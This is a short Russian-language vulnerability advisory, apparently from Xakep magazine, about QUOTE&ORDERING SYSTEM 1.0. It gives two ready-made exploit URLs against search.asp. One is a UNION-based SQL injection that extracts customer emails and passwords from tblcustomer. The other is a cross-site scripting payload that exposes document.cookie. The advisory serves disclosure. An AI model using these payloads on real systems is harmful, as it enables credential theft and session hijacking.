Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
Программа: QUOTE&ORDERING SYSTEM 1.0
Уязвимости позволяют удаленному пользователю выполнить произвольные SQL команды в базе данных приложения или выполнить произвольный скрипт в контексте безопасности уязвимого сайта.
Примеры:
//search.asp?ordernum=1+union+select+cemail,0,0,cpassword, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+from+tblcustomer &designname=&date=&statusid=statusid%3C%3E0&btnser=Search+Now
//search.asp?ordernum=%3Cscript%3EJavaScript%3Aalert%28 document.cookie%29%3B%3C%2Fscript%3E&designname=&date=&statusid=statusid%3C%3E0&btnser=Search+Now